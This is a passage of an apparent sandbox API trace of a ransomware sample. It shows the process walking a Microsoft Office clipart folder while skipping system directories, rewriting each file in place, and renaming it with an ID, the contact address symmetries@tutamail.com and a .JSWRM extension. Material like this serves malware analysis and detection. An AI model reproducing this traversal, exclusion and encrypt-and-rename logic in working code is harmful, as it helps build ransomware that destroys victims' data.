lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0098.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.814] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9660) returned 1 [0098.814] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x25b0) returned 0x24d210 [0098.814] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x25b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x25b0, lpOverlapped=0x0) returned 1 [0098.816] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.817] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x25b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x25b0, lpOverlapped=0x0) returned 1 [0098.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.817] CloseHandle (hObject=0x314) returned 1 [0098.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0098.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0098.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0098.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0098.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0098.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0098.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.817] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00116_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00116_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00116_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0098.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0098.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0098.818] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1234, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TR00126_.WMF", cAlternateFileName="")) returned 1 [0098.818] lstrcmpiW (lpString1="TR00126_.WMF", lpString2=".") returned 1 [0098.818] lstrcmpiW (lpString1="TR00126_.WMF", lpString2="..") returned 1 [0098.818] lstrcmpiW (lpString1="TR00126_.WMF", lpString2="...") returned 1 [0098.818] lstrcmpiW (lpString1="TR00126_.WMF", lpString2="windows") returned -1 [0098.818] lstrcmpiW (lpString1="TR00126_.WMF", lpString2="recovery") returned 1 [0098.818] lstrcmpiW (lpString1="TR00126_.WMF", lpString2="perflogs") returned 1 [0098.818] lstrcmpiW (lpString1="TR00126_.WMF", lpString2="documents and settings") returned 1 [0098.818] lstrcmpiW (lpString1="TR00126_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.818] lstrcmpiW (lpString1="TR00126_.WMF", lpString2="system volume information") returned 1 [0098.818] lstrcmpiW (lpString1="TR00126_.WMF", lpString2="msocache") returned 1 [0098.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0098.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00126_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00126_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00126_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0098.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0098.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00126_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00126_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00126_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0098.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0098.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0098.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0098.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00126_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00126_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.819] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4660) returned 1 [0098.819] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1230) returned 0x205850 [0098.819] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1230, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1230, lpOverlapped=0x0) returned 1 [0098.821] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.821] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1230, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1230, lpOverlapped=0x0) returned 1 [0098.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.821] CloseHandle (hObject=0x314) returned 1 [0098.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0098.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0098.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0098.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0098.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0098.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0098.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0098.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0098.822] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00126_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00126_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00126_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00126_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0098.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0098.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0098.823] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x235c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TR00172_.WMF", cAlternateFileName="")) returned 1 [0098.823] lstrcmpiW (lpString1="TR00172_.WMF", lpString2=".") returned 1 [0098.823] lstrcmpiW (lpString1="TR00172_.WMF", lpString2="..") returned 1 [0098.823] lstrcmpiW (lpString1="TR00172_.WMF", lpString2="...") returned 1 [0098.823] lstrcmpiW (lpString1="TR00172_.WMF", lpString2="windows") returned -1 [0098.823] lstrcmpiW (lpString1="TR00172_.WMF", lpString2="recovery") returned 1 [0098.823] lstrcmpiW (lpString1="TR00172_.WMF", lpString2="perflogs") returned 1 [0098.823] lstrcmpiW (lpString1="TR00172_.WMF", lpString2="documents and settings") returned 1 [0098.823] lstrcmpiW (lpString1="TR00172_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.823] lstrcmpiW (lpString1="TR00172_.WMF", lpString2="system volume information") returned 1 [0098.823] lstrcmpiW (lpString1="TR00172_.WMF", lpString2="msocache") returned 1 [0098.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0098.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00172_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00172_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00172_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0098.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0098.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00172_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00172_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00172_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0098.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0098.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0098.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0098.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.824] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9052) returned 1 [0098.824] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2350) returned 0x24d210 [0098.824] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2350, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2350, lpOverlapped=0x0) returned 1 [0098.826] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.826] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2350, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2350, lpOverlapped=0x0) returned 1 [0098.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.826] CloseHandle (hObject=0x314) returned 1 [0098.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0098.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0098.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0098.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0098.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0098.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0098.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0098.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0098.827] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00172_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00172_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00172_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0098.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0098.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0098.828] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2142, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TR00178_.WMF", cAlternateFileName="")) returned 1 [0098.828] lstrcmpiW (lpString1="TR00178_.WMF", lpString2=".") returned 1 [0098.828] lstrcmpiW (lpString1="TR00178_.WMF", lpString2="..") returned 1 [0098.828] lstrcmpiW (lpString1="TR00178_.WMF", lpString2="...") returned 1 [0098.828] lstrcmpiW (lpString1="TR00178_.WMF", lpString2="windows") returned -1 [0098.828] lstrcmpiW (lpString1="TR00178_.WMF", lpString2="recovery") returned 1 [0098.828] lstrcmpiW (lpString1="TR00178_.WMF", lpString2="perflogs") returned 1 [0098.828] lstrcmpiW (lpString1="TR00178_.WMF", lpString2="documents and settings") returned 1 [0098.828] lstrcmpiW (lpString1="TR00178_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.828] lstrcmpiW (lpString1="TR00178_.WMF", lpString2="system volume information") returned 1 [0098.828] lstrcmpiW (lpString1="TR00178_.WMF", lpString2="msocache") returned 1 [0098.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0098.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00178_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00178_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00178_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0098.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0098.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00178_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00178_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00178_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0098.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0098.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0098.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0098.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00178_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00178_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.829] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8514) returned 1 [0098.829] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2140) returned 0x205850 [0098.829] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2140, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2140, lpOverlapped=0x0) returned 1 [0098.942] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.942] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2140, lpOverlapped=0x0) returned 1 [0098.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.942] CloseHandle (hObject=0x314) returned 1 [0098.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0098.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.942] RtlAllocateHeap 